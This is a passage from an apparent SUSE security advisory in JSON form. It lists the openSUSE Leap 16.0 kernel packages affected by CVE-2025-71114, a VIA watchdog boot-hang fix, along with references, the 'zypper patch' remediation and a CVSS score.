"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71113"
},
{
"cve": "CVE-2025-71114",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71114"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvia_wdt: fix critical boot hang due to unnamed resource allocation\n\nThe VIA watchdog driver uses allocate_resource() to reserve a MMIO\nregion for the watchdog control register. However, the allocated\nresource was not given a name, which causes the kernel resource tree\nto contain an entry marked as \"\u003cBAD\u003e\" under /proc/iomem on x86\nplatforms.\n\nDuring boot, this unnamed resource can lead to a critical hang because\nsubsequent resource lookups and conflict checks fail to handle the\ninvalid entry properly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71114",
"url": "https://www.suse.com/security/cve/CVE-2025-71114"
},
{
"category": "external",
"summary": "SUSE Bug 1256752 for CVE-2025-71114",
"url": "https://bugzilla.suse.com/1256752"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
